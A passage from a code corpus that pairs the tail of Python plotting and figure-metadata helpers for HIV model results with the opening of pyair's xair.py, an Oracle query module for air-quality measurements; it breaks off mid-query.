        cmap_base_r = cmap_base + '_r'
    cmaps = (cmap_base_r, cmap_base)
    cmaps_ = [cm.get_cmap(c) for c in cmaps]
    # NOTE(review): relies on the private `_segmentdata` entries being
    # callables -- only true for function-based colormaps; confirm for
    # the maps actually passed in.
    def cfunc(k):
        def f(x):
            # Left half samples the reversed map, right half the base map,
            # each rescaled to the full [0, 1] range.
            return numpy.where(x < 0.5,
                               cmaps_[0]._segmentdata[k](2 * x),
                               cmaps_[1]._segmentdata[k](2 * (x - 0.5)))
        return f
    cdict = {k: cfunc(k) for k in ('red', 'green', 'blue')}
    return colors.LinearSegmentedColormap(cmap_base + '_reflected', cdict)
def cmap_scaled(cmap_base, vmin = 0, vmax = 1, N = 256):
    '''Build a new colormap from the [vmin, vmax] portion of *cmap_base*,
    sampled at *N* points.'''
    base = cm.get_cmap(cmap_base)
    samples = base(numpy.linspace(vmin, vmax, N))
    return colors.LinearSegmentedColormap.from_list(cmap_base + '_scaled',
                                                    samples)
_cp = seaborn.color_palette('Paired', 12)
_ix = [6, 7, 0, 1, 2, 3, 4, 5, 8, 9, 10, 11]
colors_paired = [_cp[i] for i in _ix]
def get_target_label(target):
    '''Human-readable label for a target: drop anything from the first
    '(' onward and capitalize the result.'''
    label, _, _ = str(target).partition('(')
    return label.capitalize()
class StatInfoEntry:
    '''Presentation metadata (label, scale, units) for one statistic.

    `units` of '%%' is the matplotlib-escaped percent sign; `scale` is
    the divisor applied to raw values before display.
    '''

    def __init__(self, **kwargs):
        # Defaults, overridable via keyword arguments.
        self.percent = False
        self.scale = None
        self.units = ''
        for (attr, value) in kwargs.items():
            setattr(self, attr, value)
        if self.percent:
            # Percent display always wins over any explicit scale/units.
            self.scale = 1 / 100
            self.units = '%%'

    def autoscale(self, data):
        '''Choose scale & units (millions / thousands / none) from data.'''
        vmax = numpy.nanmax(data) if len(data) > 0 else 0
        if vmax > 1e6:
            self.scale, self.units = 1e6, 'M'
        elif vmax > 1e3:
            self.scale, self.units = 1e3, 'k'
        else:
            self.scale, self.units = 1, ''

    def autounits(self, data):
        '''Refine units for data already divided by the current scale.'''
        vmax = (numpy.nanmax(data) / self.scale) if len(data) > 0 else 0
        if vmax > 1e6:
            self.scale *= 1e6
            self.units = 'M'
        elif vmax > 1e3:
            self.scale *= 1e3
            self.units = 'k'
        else:
            self.units = ''
_stat_info = dict(
infected = StatInfoEntry(label = 'PLHIV\n'),
prevalence = StatInfoEntry(label = 'Prevalence\n',
percent = True),
incidence_per_capita = StatInfoEntry(label = 'Incidence\n(per M per y)',
scale = 1e-6,
units = None),
drug_coverage = StatInfoEntry(label = 'ART\nCoverage',
percent = True),
AIDS = StatInfoEntry(label = 'PLAIDS\n'),
dead = StatInfoEntry(label = 'HIV-related\ndeaths'),
viral_suppression = StatInfoEntry(label = 'Viral\nsupression',
percent = True),
new_infections = StatInfoEntry(label = 'Cumulative\nincidence'),
)
def get_stat_info(stat):
    '''Look up display metadata for *stat*; synthesize a default entry
    (capitalized label) for unknown statistics.'''
    entry = _stat_info.get(stat)
    if entry is not None:
        # Copy so callers can autoscale without mutating the registry.
        return copy.copy(entry)
    return StatInfoEntry(label = stat.capitalize())
def _none_func():
def f(*args, **kwargs):
return None
return f
def data_infected_getter(parameters):
    '''Number of people living with HIV: prevalence times population.'''
    prevalence = parameters.prevalence
    population = parameters.population
    return prevalence * population
# Everything not listed returns 'None', indicating no data.
data_hist_getter = collections.defaultdict(
_none_func,
infected = data_infected_getter,
prevalence = operator.attrgetter('prevalence'),
incidence_per_capita = operator.attrgetter('incidence_per_capita'),
drug_coverage = operator.attrgetter('drug_coverage')
)
class DataGetter(dict):
    '''Map a statistic name to a function extracting it from a results
    object.  Unknown statistics fall back to plain attribute access.

    Fixes vs. original: ``__getitem__`` discarded the looked-up value
    (missing ``return`` before ``super().__getitem__``), so registered
    getters silently returned None; and the viral-suppression getter was
    registered under the key 'viral_suppress' while the statistic is
    named 'viral_suppression' elsewhere in this module.
    '''

    def __init__(self):
        self['drug_coverage'] = operator.attrgetter('proportions.treated')
        self['viral_suppression'] = self.viral_suppression_getter

    def __getitem__(self, key):
        try:
            return super().__getitem__(key)
        except KeyError:
            # Default: attribute of the same name on the results object.
            return operator.attrgetter(key)

    @staticmethod
    def viral_suppression_getter(results):
        '''Fraction of infected people who are virally suppressed.'''
        return (results.viral_suppression / results.infected)
data_getter = DataGetter()
def format_axes(ax, country, info,
                country_label, stat_label,
                country_short_name = True,
                plot_hist = False,
                tick_interval = 10,
                space_to_newline = False):
    '''
    Do common formatting.

    Sets x limits/ticks over the simulation period (or from the
    historical-data start year when *plot_hist*), clamps y to be
    non-negative, attaches the units formatter from *info*, and places
    the country name and statistic label as ylabel/title according to
    *country_label* and *stat_label* ('ylabel', 'title', or anything
    else to omit).
    '''
    # Left end of the x axis: historical start or simulation start.
    if plot_hist:
        a = historical_data_start_year
    else:
        a = int(numpy.floor(t[0]))
    b = int(numpy.ceil(t[-1]))
    ticks = range(a, b, tick_interval)
    # Include the right endpoint when it lands on a tick.
    if ((b - a) % tick_interval) == 0:
        ticks = list(ticks) + [b]
    ax.set_xticks(ticks)
    ax.set_xlim(a, b)
    # Never show negative values on the y axis.
    a, b = ax.get_ylim()
    if a < 0:
        ax.set_ylim(0, b)
    ax.yaxis.set_major_locator(ticker.MaxNLocator(nbins = 5))
    ax.xaxis.set_major_formatter(ticker.ScalarFormatter(useOffset = False))
    ax.yaxis.set_major_formatter(UnitsFormatter(info.units))
    # One minor tick between major ticks.
    # ax.xaxis.set_minor_locator(ticker.AutoMinorLocator(2))
    # ax.yaxis.set_minor_locator(ticker.AutoMinorLocator(2))
    if country_short_name:
        country = get_country_short_name(country)
    if space_to_newline:
        country = country.replace(' ', '\n')
    # Decide what goes in the ylabel vs. the title.
    ylabel = None
    title = None
    if country_label == 'ylabel':
        ylabel = country
    elif country_label == 'title':
        title = country
    if stat_label == 'ylabel':
        ylabel = info.label
    elif stat_label == 'title':
        title = info.label
    if ylabel is not None:
        ax.set_ylabel(ylabel, va = 'baseline', ha = 'center')
    if title is not None:
        title_ = ax.set_title(title, va = 'center', ha = 'center')
        title_.set_y(1.07)
def _get_title(filename):
base, _ = os.path.splitext(os.path.basename(filename))
title = base.replace('_', ' ').capitalize()
return title
def _has_bin(binname):
    '''
    Test if a binary is present on the system.
    '''
    completed = subprocess.run(['which', binname],
                               stdout = subprocess.PIPE)
    return completed.returncode == 0
def pdf_add_info(filename, **kwargs):
    '''
    Use pdftk to set PDF metadata.

    Missing Author/Title/CreationDate/ModDate keys are filled with
    defaults.  The file is rewritten in place, preserving permissions.
    Fix vs. original: the file descriptor returned by
    ``tempfile.mkstemp()`` was never closed (descriptor leak).
    '''
    if _has_bin('pdftk'):
        if 'Author' not in kwargs:
            kwargs['Author'] = author
        if 'Title' not in kwargs:
            kwargs['Title'] = _get_title(filename)
        curtime = time.strftime('D:%Y%m%d%H%M%S')
        for key in ['CreationDate', 'ModDate']:
            if key not in kwargs:
                kwargs[key] = curtime
        # Build info in pdftk's required format.
        def build_info_item(key, value):
            return 'InfoBegin\nInfoKey: {}\nInfoValue: {}'.format(key, value)
        infostr = '\n'.join(build_info_item(k, v) for (k, v) in kwargs.items())
        # pdftk will write to a tempfile, then we'll replace the original
        # file with the tempfile.
        tempfd, tempname = tempfile.mkstemp()
        os.close(tempfd)  # pdftk opens the path itself; close our fd.
        args = ['pdftk', filename, 'update_info_utf8', '-', 'output', tempname]
        cp = subprocess.run(args, input = infostr.encode('utf-8'))
        cp.check_returncode() # Make sure it succeeded.
        st = os.stat(filename) # To preserve permissions
        os.replace(tempname, filename)
        os.chmod(filename, st.st_mode) # Set permissions
    else:
        # NOTE(review): raising a Warning subclass aborts the caller;
        # warnings.warn() may be the intended behavior -- confirm.
        raise RuntimeWarning("'pdftk' not found. PDF info not added.")
def pdfoptimize(filename):
    '''Rewrite *filename* through pdftocairo to optimize it, in place,
    preserving permissions.

    Fix vs. original: the file descriptor returned by
    ``tempfile.mkstemp()`` was never closed (descriptor leak).
    '''
    if _has_bin('pdftocairo'):
        tempfd, tempname = tempfile.mkstemp()
        os.close(tempfd)  # pdftocairo opens the path itself; close our fd.
        args = ['pdftocairo', '-pdf', filename, tempname]
        print('Optimizing {}.'.format(filename))
        cp = subprocess.run(args)
        cp.check_returncode() # Make sure it succeeded.
        st = os.stat(filename) # To preserve permissions
        os.replace(tempname, filename)
        os.chmod(filename, st.st_mode) # Set permissions
    else:
        raise RuntimeWarning("'pdftocairo' not found. PDF not optimized.")
_keymap = {'Author': 'Artist',
'Title': 'ImageDescription'}
def image_add_info(filename, **kwargs):
    '''
    Embed Author/Title metadata into a TIFF or PNG image in place.

    filename: path of the image; rewritten in place with its original
        permissions for TIFF and PNG, silently left untouched for any
        other format.
    **kwargs: metadata fields; Author and Title default to the module
        author and a title derived from the file name.
    '''
    if 'Author' not in kwargs:
        kwargs['Author'] = author
    if 'Title' not in kwargs:
        kwargs['Title'] = _get_title(filename)
    im = Image.open(filename)
    format_ = im.format
    if format_ == 'TIFF':
        from PIL import TiffImagePlugin
        info = dict(im.tag_v2)
        for (key, value) in kwargs.items():
            # Convert to TIFF tag names.
            tagname = _keymap.get(key, key)
            # Get tag ID number.
            tagid = getattr(TiffImagePlugin, tagname.upper())
            info[tagid] = value
        # Drop alpha channel.
        im = im.convert('CMYK')
        tempfd, tempname = tempfile.mkstemp()
        os.close(tempfd)  # fix: mkstemp's fd was leaked; PIL re-opens the file by name
        im.save(tempname, format_,
                tiffinfo=info,
                compression='tiff_lzw')
        st = os.stat(filename)  # To preserve permissions
        os.replace(tempname, filename)
        os.chmod(filename, st.st_mode)  # Set permissions
    elif im.format == 'PNG':
        from PIL import PngImagePlugin
        info = PngImagePlugin.PngInfo()
        for (key, value) in kwargs.items():
            # Same key mapping as for TIFF, emitted as PNG text chunks.
            tagname = _keymap.get(key, key)
            info.add_text(tagname, value)
        tempfd, tempname = tempfile.mkstemp()
        os.close(tempfd)  # fix: mkstemp's fd was leaked
        im.save(tempname, format_,
                pnginfo=info,
                optimize=True)
        st = os.stat(filename)  # To preserve permissions
        os.replace(tempname, filename)
        os.chmod(filename, st.st_mode)  # Set permissions
    im.close()
def savefig(fig, filename, title = None, **kwargs):
    """Save *fig* to *filename* and stamp Author/Title metadata on it.

    PDF output is tagged through pdftk, PGF gets no metadata (it is LaTeX
    source), and raster formats are tagged via PIL with a 600 dpi default.
    Extra keyword arguments are forwarded to ``fig.savefig``.
    """
    meta = {'Author': author,
            'Title': _get_title(filename) if title is None else title}
    if filename.endswith('.pdf'):
        fig.savefig(filename, **kwargs)
        pdf_add_info(filename, **meta)
    elif filename.endswith('.pgf'):
        fig.savefig(filename, **kwargs)
    else:
        kwargs.setdefault('dpi', 600)
        fig.savefig(filename, **kwargs)
        # Use PIL etc to set metadata.
        image_add_info(filename, **meta)
| agpl-3.0 |
LionelR/pyair | pyair/xair.py | 1 | 25393 | #!/usr/bin/python
# -*- coding: UTF-8 -*-
"""
**Air Quality
Module de connexion et de récupération de données sur une base XAIR
"""
import cx_Oracle
import pandas as pd
import pandas.io.sql as psql
import datetime as dt
# XAIR state letters that mark a measurement as invalid / missing.
INVALID_CODES = ['C', 'D', 'I', 'M', 'Z', 'B', 'N', 'X', 'G', 'H']
MISSING_CODE = 'N'


def is_invalid(e):
    """Return True when *e* is one of the XAIR invalid-state codes.

    Parameters:
    e: a single upper-case state letter
    """
    return any(code == e for code in INVALID_CODES)
def etats_to_invalid(etats):
    """
    Turn a DataFrame of state codes into an invalidation mask.

    Parameters:
    etats: DataFrame of state codes, as returned by get_mesure with the
    brut=True parameter

    Returns:
    A boolean DataFrame.  Each value is either False and the matching
    measurement (same position in the measurement DataFrame) is valid,
    or True and the measurement is invalid.
    """
    # DataFrame.applymap is deprecated since pandas 2.1; isin performs the
    # same element-wise membership test against INVALID_CODES.
    return etats.isin(INVALID_CODES)
def to_date(date, dayfirst=False, format=None):
    """
    Coerce a date field into a python datetime object.

    Parameters:
    date:
        - None: return today's date at midnight
        - str: parsed into a datetime
        - datetime: returned unchanged
        - date: promoted to a datetime at midnight
    dayfirst: when parsing a str, tells the parser the day comes first
        (e.g. 11/09/2012 would otherwise be read as November 9th)
    format: explicit strftime-style format string for str inputs
    """
    ## TODO: check whether pd.tseries.api could replace all of this
    if not date:
        # fromordinal of today zeroes hours/minutes/seconds, unlike now().
        return dt.datetime.fromordinal(dt.date.today().toordinal())
    if isinstance(date, dt.datetime):
        return date
    if isinstance(date, str):
        return pd.to_datetime(date, dayfirst=dayfirst, format=format)
    # Checked after datetime on purpose: datetime is a subclass of date.
    if isinstance(date, dt.date):
        return dt.datetime.fromordinal(date.toordinal())
    raise ValueError("Les dates doivent être de type None, str, datetime.date ou datetime.datetime")
def _format(noms):
"""
Formate une donnée d'entrée pour être exploitable dans les fonctions liste_*
et get_*.
Paramètres:
noms: chaîne de caractère, liste ou tuples de chaînes de caractères ou
pandas.Series de chaînes de caractères.
Retourne:
Une chaînes de caractères dont chaque élément est séparé du suivant par les
caractères ',' (simples quotes comprises)
"""
if isinstance(noms, (list, tuple, pd.Series)):
noms = ','.join(noms)
noms = noms.replace(",", "','")
return noms
def date_range(debut, fin, freq):
    """
    Build a complete date index covering whole days: the start is anchored
    at 00:00 and the end at 23:59.  For monthly/yearly frequencies the
    anchor moves to the first day of the period via the 'MS'/'AS'
    start-of-period aliases.

    Parameters:
    debut: start datetime
    fin: end datetime
    freq: pandas offset alias - T (minute), H (hour), D (day), M (month),
          A (year); cycles such as 15T are accepted
    """
    start = debut.replace(hour=0, minute=0, second=0, microsecond=0)
    end = fin.replace(hour=23, minute=59, second=0, microsecond=0)
    if freq in ('M', 'A'):
        freq += 'S'  # anchor the frequency on the period start
        start = start.replace(day=1, minute=0, second=0, microsecond=0)
        end = end.replace(day=1, minute=0, second=0, microsecond=0)
    return pd.date_range(start=start, end=end, freq=freq)
class XAIR:
    """Connection and data-retrieval helpers for an XAIR air-quality database.

    Usage :
    import pyair
    xr=pyair.xair.XAIR(user, pwd, adr, port=1521, base='N')
    xr.liste_stations()
    mes=xr.liste_mesures(reseau='OZONE').MESURES
    m=xr.get_mesure(mes=mes, debut="2009-01-01", fin="2009-12-31", freq='H')
    m.describe()
    """
    def __init__(self, user, pwd, adr, port=1521, base='N', initial_connect=True):
        # Oracle EZCONNECT-style connect string: user/pwd@host:port/service
        self._ORA_FULL = "{0}/{1}@{2}:{3}/{4}".format(user, pwd, adr, port, base)
        if initial_connect:
            self._connect()

    def _connect(self):
        """
        Open the connection to the XAIR database.
        """
        try:
            # Goes through Oracle Instant Client with the ORA_FULL TNS string.
            self.conn = cx_Oracle.connect(self._ORA_FULL)
            self.cursor = self.conn.cursor()
            print('XAIR: Connexion établie')
        except cx_Oracle.Error as e:
            print("Erreur: %s" % (e))
            raise cx_Oracle.Error('Echec de connexion')

    def reconnect(self):
        # Re-open the connection (e.g. after a network drop or timeout).
        self._connect()

    def disconnect(self):
        """
        Close the connection to the database.
        """
        self._close()

    def _close(self):
        self.cursor.close()
        self.conn.close()
        print('XAIR: Connexion fermée')

    def liste_parametres(self, parametre=None):
        """
        List the chemical parameters.

        Parameters:
        parametre: if given, return only the entry for that parameter
        """
        condition = ""
        if parametre:
            condition = "WHERE CCHIM='%s'" % parametre
        _sql = """SELECT CCHIM AS PARAMETRE,
        NCON AS LIBELLE,
        NOPOL AS CODE
        FROM NOM_MESURE %s ORDER BY CCHIM""" % condition
        return psql.read_sql(_sql, self.conn)

    def liste_mesures(self, reseau=None, station=None, parametre=None, mesure=None):
        """
        Describe the measurements:
        - of one or several networks,
        - of one or several stations,
        - of one or several parameters
        or describe one (or several) measurements by identifier.

        Each attribute may hold several names separated by commas, or a
        list/tuple/pandas.Series of names.  E.g. to list wind speed and
        direction measurements: parametre="VV,DV" or = ["VV", "DV"].
        The arguments are ANDed together to select the measurements.

        Parameters:
        reseau : network(s) in which to list the measurements
        station: station(s) where to list the measurements
        parametre: chemical code(s) of the parameter to list
        mesure: measurement name(s) to describe
        """
        tbreseau = ""
        conditions = []
        if reseau:
            reseau = _format(reseau)
            tbreseau = """INNER JOIN RESEAUMES R USING (NOM_COURT_MES) """
            conditions.append("""R.NOM_COURT_RES IN ('%s') """ % reseau)
        if parametre:
            parametre = _format(parametre)
            conditions.append("""N.CCHIM IN ('%s')""" % parametre)
        if station:
            station = _format(station)
            conditions.append("""S.IDENTIFIANT IN ('%s')""" % station)
        if mesure:
            mesure = _format(mesure)
            conditions.append("""M.IDENTIFIANT IN ('%s')""" % mesure)
        condition = "WHERE %s" % " and ".join(conditions) if conditions else ""
        _sql = """SELECT
        M.IDENTIFIANT AS MESURE,
        M.NOM_MES AS LIBELLE,
        M.UNITE AS UNITE,
        S.IDENTIFIANT AS STATION,
        N.CCHIM AS CODE_PARAM,
        N.NCON AS PARAMETRE
        FROM MESURE M
        INNER JOIN NOM_MESURE N USING (NOPOL)
        INNER JOIN STATION S USING (NOM_COURT_SIT)
        %s
        %s
        ORDER BY M.IDENTIFIANT""" % (tbreseau, condition)
        return psql.read_sql(_sql, self.conn)

    def detail_df(self, df):
        """
        Return the characteristics of the measurements of a dataframe.

        Parameters:
        df: dataframe to describe, as returned by get_mesure()

        Returns:
        The same information as liste_mesures()
        """
        return self.liste_mesures(mesure=df.columns.tolist())

    def liste_stations(self, station=None, detail=False):
        """
        List the stations.

        Parameters:
        station : a valid station name (if empty, list every station)
        detail : if True, show more detail about the station(s)
        """
        condition = ""
        if station:
            station = _format(station)
            condition = "WHERE IDENTIFIANT IN ('%s')" % station
        select = ""
        if detail:
            select = """,
            ISIT AS DESCRIPTION,
            NO_TELEPHONE AS TELEPHONE,
            ADRESSE_IP,
            LONGI AS LONGITUDE,
            LATI AS LATITUDE,
            ALTI AS ALTITUDE,
            AXE AS ADR,
            CODE_POSTAL AS CP,
            FLAG_VALID AS VALID"""
        _sql = """SELECT
        NSIT AS NUMERO,
        IDENTIFIANT AS STATION %s
        FROM STATION
        %s
        ORDER BY NSIT""" % (select, condition)
        return psql.read_sql(_sql, self.conn)

    def liste_reseaux(self):
        """List the measurement sub-networks."""
        _sql = """SELECT
        NOM_COURT_RES AS RESEAU,
        NOM_RES AS LIBELLE
        FROM RESEAUDEF ORDER BY NOM_COURT_RES"""
        return psql.read_sql(_sql, self.conn)

    def liste_campagnes(self, campagne=None):
        """
        List the measurement campaigns and their associated stations.

        Parameters:
        campagne: if given, list the stations of that campaign only
        """
        condition = ""
        if campagne:
            condition = "WHERE NOM_COURT_CM='%s' """ % campagne
        _sql = """SELECT
        NOM_COURT_CM AS CAMPAGNE,
        IDENTIFIANT AS STATION,
        LIBELLE AS LIBELLE_CM,
        DATEDEB AS DEBUT,
        DATEFIN AS FIN
        FROM CAMPMES
        INNER JOIN CAMPMES_STATION USING (NOM_COURT_CM)
        INNER JOIN STATION USING (NOM_COURT_SIT)
        %s ORDER BY DATEDEB DESC""" % condition
        return psql.read_sql(_sql, self.conn)

    def liste_reseaux_indices(self):
        """List the ATMO index networks."""
        _sql = """SELECT NOM_AGGLO AS GROUPE_ATMO, NOM_COURT_GRP FROM GROUPE_ATMO"""
        return psql.read_sql(_sql, self.conn)

    def liste_sites_prelevement(self):
        """List the manual sampling sites."""
        _sql = """SELECT NSIT, LIBELLE FROM SITE_PRELEVEMENT ORDER BY NSIT"""
        return psql.read_sql(_sql, self.conn)

    def get_mesures(self, mes, debut=None, fin=None, freq='H', format=None,
                    dayfirst=False, brut=False):
        """
        Retrieve measurement data.

        Parameters:
        mes: one measurement name, several separated by commas, or a
            list/tuple/pandas.Series of names
        debut: string or datetime describing the start date.
            Default=today
        fin: string or datetime describing the end date.
            Default=start date
        freq: time frequency. '15T' | 'H' | 'D' | 'M' | 'A' (15T = quarter-hour)
        format: strftime-style format string for debut/fin when they are
            strings (e.g. "%Y-%m-%d" for "2013-01-28").
            Default="%Y-%m-%d"
        dayfirst: when no format is given and the dates are strings, tells
            the parser the day comes first (11/09/2012 would otherwise be
            read as November 9th)
        brut: whether to return the raw, non-invalidated dataframe together
            with the state codes.
            Default=False

        Returns:
        A dataframe holding all requested measurements.
        With brut=True, returns the raw non-invalidated dataframe and the
        dataframe of state codes.  The net (valid) dataframe can then be
        recomputed with:
        brut, etats = xr.get_mesure(..., brut=True)
        invalides = etats_to_invalid(etats)
        net = brut.mask(invalides)
        """
        def create_index(index, freq):
            """
            Build the new [id, date] index with the date shifted according
            to the requested time step.
            index: index of the old dataframe, shaped [date at midnight,
            offset to add]
            """
            # Compensates for the convention of stamping a period on its
            # end (e.g. pollution from 23:00 to midnight is stamped 24h).
            decalage = 1
            # NOTE(review): these are independent ifs, so the final `else`
            # belongs to `if freq == 'A'` only and re-binds f to Hour for
            # every freq except 'A' (including 'M', '15T', 'D') — this
            # looks unintended; confirm monthly/quarter-hour indexing.
            if freq == 'T' or freq == '15T':
                f = pd.tseries.offsets.Minute
                decalage = 15
            if freq == 'H':
                f = pd.tseries.offsets.Hour
            if freq == 'D':
                f = pd.tseries.offsets.Day
            if freq == 'M':
                f = pd.tseries.offsets.MonthBegin
            if freq == 'A':
                f = pd.tseries.offsets.YearBegin
            else:
                f = pd.tseries.offsets.Hour
            new_index = [date + f(int(delta) - decalage) for date, delta in index]
            return new_index

        # Reformat the measurement-name field.
        mes = _format(mes)
        # Parse the date fields.
        debut = to_date(debut, dayfirst, format)
        if not fin:
            fin = debut
        else:
            fin = to_date(fin, dayfirst, format)
        # The 'Q' frequency does not exist; go through 15 minutes instead.
        if freq in ('Q', 'T'):
            freq = '15T'
        # Select the columns and table matching the requested frequency.
        if freq == '15T':
            diviseur = 96
            champ_val = ','.join(['Q_M%02i AS "%i"' % (x, x * 15) for x in range(1, diviseur + 1)])
            champ_code = 'Q_ETATV'
            table = 'JOURNALIER'
        elif freq == 'H':
            diviseur = 24
            champ_val = ','.join(['H_M%02i AS "%i"' % (x, x) for x in range(1, diviseur + 1)])
            champ_code = 'H_ETAT'
            table = 'JOURNALIER'
        elif freq == 'D':
            diviseur = 1
            champ_val = 'J_M01 AS "1"'
            champ_code = 'J_ETAT'
            table = 'JOURNALIER'
        elif freq == 'M':
            diviseur = 12
            champ_val = ','.join(['M_M%02i AS "%i"' % (x, x) for x in range(1, diviseur + 1)])
            champ_code = 'M_ETAT'
            table = 'MOIS'
        elif freq == 'A':
            diviseur = 1
            champ_val = 'A_M01 AS "1"'
            champ_code = 'A_ETAT'
            table = 'MOIS'
        else:
            raise ValueError("freq doit être T, H, D, M ou A")
        if table == 'JOURNALIER':
            champ_date = 'J_DATE'
            debut_db = debut
            fin_db = fin
        else:
            champ_date = 'M_DATE'
            # For freq='M' and 'A' the table holds a whole year per row.
            # To avoid breaking retrieval with mid-year dates, snap them to
            # the start and end of the year; the real clipping happens
            # later, at the reindex step.
            debut_db = debut.replace(month=1, day=1, hour=0, minute=0)
            fin_db = fin.replace(month=12, day=31, hour=23, minute=0)
        debut_db = debut_db.strftime("%Y-%m-%d")
        fin_db = fin_db.strftime("%Y-%m-%d")
        # Fetch the values and their associated state codes.
        _sql = """SELECT
        IDENTIFIANT as "id",
        {champ_date} as "date",
        {champ_code} as "etat",
        {champ_val}
        FROM {table}
        INNER JOIN MESURE USING (NOM_COURT_MES)
        WHERE IDENTIFIANT IN ('{mes}')
        AND {champ_date} BETWEEN TO_DATE('{debut}', 'YYYY-MM-DD') AND TO_DATE('{fin}', 'YYYY-MM-DD')
        ORDER BY IDENTIFIANT, {champ_date} ASC""".format(champ_date=champ_date,
                                                         table=table,
                                                         champ_code=champ_code,
                                                         mes=mes,
                                                         champ_val=champ_val,
                                                         debut=debut_db,
                                                         fin=fin_db)
        ## TODO: try this once the database runs version 11g
        # _sql = """SELECT *
        # FROM ({selection})
        # UNPIVOT (IDENTIFIANT FOR VAL IN ({champ_as}))""".format(selection=_sql,
        # champ_date=champ_date,
        # champ_as=champ_as)
        # Fetch the values for the frequency into a dataframe.
        rep = psql.read_sql(_sql, self.conn)
        # Build a multiindex to manipulate the dataframe more easily.
        df = rep.set_index(['id', 'date'])
        # Stack the dataframe to turn columns into rows, dropping the state
        # column, then unstack on the id to get pollutants as columns.
        etats = df['etat']
        df = df.drop('etat', axis=1)
        df_stack = df.stack(dropna=False)
        df = df_stack.unstack('id')
        # Compute a new index with the proper dates.  The df index is made
        # of the midnight date plus the value-column aliases (1..24 for the
        # hours, etc., see champ_val).  Combining both yields the aligned
        # dates used as the final index.
        index = create_index(df.index, freq)
        df.reset_index(inplace=True, drop=True)
        df['date'] = index
        df = df.set_index(['date'])
        # State-code processing: concatenate the codes per pollutant.
        # etats = etats.sum(level=0)
        # etats = pd.DataFrame(zip(*etats.apply(list)))
        etats = etats.unstack('id')
        etats.fillna(value=MISSING_CODE * diviseur, inplace=True)
        etats = etats.sum(axis=0)
        etats = pd.DataFrame(list(zip(*etats.apply(list))))
        etats.index = df.index
        etats.columns = df.columns
        # Replace values at missing dates with NaN.
        dates_completes = date_range(debut, fin, freq)
        df = df.reindex(dates_completes)
        etats = etats.reindex(dates_completes)
        # Invalidation by state code: for each code, mark whether it is
        # invalidating by replacing it with a boolean.
        invalid = etats_to_invalid(etats)
        if not brut:
            # Mask every invalid value with NaN.
            dfn = df.mask(invalid)  # net DataFrame
            return dfn
        else:
            return df, etats

    def get_manuelles(self, site, code_parametre, debut, fin, court=False):
        """
        Retrieve the manual (laboratory) measurements for a site.

        site: site number (see liste_sites_prelevement)
        code_parametre: ISO code of the parameter to search (C6H6=V4)
        debut: start date of the first sampling
        fin: end date of the last sampling
        court: return a short or long (more columns) table
        """
        condition = "WHERE MESLA.NOPOL='%s' " % code_parametre
        condition += "AND SITMETH.NSIT=%s " % site
        condition += "AND PRELEV.DATE_DEB>=TO_DATE('%s', 'YYYY-MM-DD') " % debut
        condition += "AND PRELEV.DATE_FIN<=TO_DATE('%s', 'YYYY-MM-DD') " % fin
        if court == False:
            select = """SELECT
            MESLA.LIBELLE AS MESURE,
            METH.LIBELLE AS METHODE,
            ANA.VALEUR AS VALEUR,
            MESLA.UNITE AS UNITE,
            ANA.CODE_QUALITE AS CODE_QUALITE,
            ANA.DATE_ANA AS DATE_ANALYSE,
            ANA.ID_LABO AS LABO,
            PRELEV.DATE_DEB AS DEBUT,
            PRELEV.DATE_FIN AS FIN,
            ANA.COMMENTAIRE AS COMMENTAIRE,
            SITE.LIBELLE AS SITE,
            SITE.AXE AS ADRESSE,
            COM.NOM_COMMUNE AS COMMUNE"""
        else:
            select = """SELECT
            MESLA.LIBELLE AS MESURE,
            ANA.VALEUR AS VALEUR,
            MESLA.UNITE AS UNITE,
            ANA.CODE_QUALITE AS CODE_QUALITE,
            PRELEV.DATE_DEB AS DEBUT,
            PRELEV.DATE_FIN AS FIN,
            SITE.AXE AS ADRESSE,
            COM.NOM_COMMUNE AS COMMUNE"""
        _sql = """%s
        FROM ANALYSE ANA
        INNER JOIN PRELEVEMENT PRELEV ON (ANA.CODE_PRELEV=PRELEV.CODE_PRELEV AND ANA.CODE_SMP=PRELEV.CODE_SMP)
        INNER JOIN MESURE_LABO MESLA ON (ANA.CODE_MES_LABO=MESLA.CODE_MES_LABO AND ANA.CODE_SMP=MESLA.CODE_SMP)
        INNER JOIN SITE_METH_PRELEV SITMETH ON (ANA.CODE_SMP=SITMETH.CODE_SMP)
        INNER JOIN METH_PRELEVEMENT METH ON (SITMETH.CODE_METH_P=METH.CODE_METH_P)
        INNER JOIN SITE_PRELEVEMENT SITE ON (SITE.NSIT=SITMETH.NSIT)
        INNER JOIN COMMUNE COM ON (COM.NINSEE=SITE.NINSEE)
        %s
        ORDER BY MESLA.NOPOL,MESLA.LIBELLE,PRELEV.DATE_DEB""" % (select, condition)
        return psql.read_sql(_sql, self.conn)

    def get_indices(self, res, debut, fin):
        """
        Retrieve the ATMO indices for a given network.

        Parameters:
        res : name(s) of the network(s) to search (str, list, pandas.Series)
        debut: start date, YYYY-MM-DD format (str)
        fin: end date, YYYY-MM-DD format (str)
        """
        res = _format(res)
        _sql = """SELECT
        J_DATE AS "date",
        NOM_AGGLO AS "reseau",
        C_IND_CALCULE AS "indice"
        FROM RESULTAT_INDICE
        INNER JOIN GROUPE_ATMO USING (NOM_COURT_GRP)
        WHERE NOM_AGGLO IN ('%s')
        AND J_DATE BETWEEN TO_DATE('%s', 'YYYY-MM-DD') AND TO_DATE('%s', 'YYYY-MM-DD') """ % (res, debut, fin)
        rep = psql.read_sql(_sql, self.conn)
        df = rep.set_index(['reseau', 'date'])
        df = df['indice']
        df = df.unstack('reseau')
        # Re-align on a complete daily index so missing days show as NaN.
        dates_completes = date_range(to_date(debut), to_date(fin), freq='D')
        df = df.reindex(dates_completes)
        return df

    def get_indices_et_ssi(self, reseau, debut, fin, complet=True):
        """Return the index and the sub-indices.

        complet: return the final ("complete") values or the forecast ones
        reseau: network name to return
        debut: start date to return
        fin: end date to return

        Returns: reseau, date, index, sub-indices NO2, PM10, O3, SO2
        """
        if complet:
            i_str = "c_ind_diffuse"
            ssi_str = "c_ss_indice"
        else:
            i_str = "p_ind_diffuse"
            ssi_str = "p_ss_indice"
        _sql = """SELECT
        g.nom_agglo as "reseau",
        i.j_date as "date",
        max(case when i.{0}>0 then i.{0} else 0 end) indice,
        max(case when n.cchim='NO2' then ssi.{1} else 0 end) no2,
        max(case when n.cchim='PM10' then ssi.{1} else 0 end) pm10,
        max(case when n.cchim='O3' then ssi.{1} else 0 end) o3,
        max(case when n.cchim='SO2' then ssi.{1} else 0 end) so2
        FROM resultat_indice i
        INNER JOIN resultat_ss_indice ssi ON (i.nom_court_grp=ssi.nom_court_grp AND i.j_date=ssi.j_date)
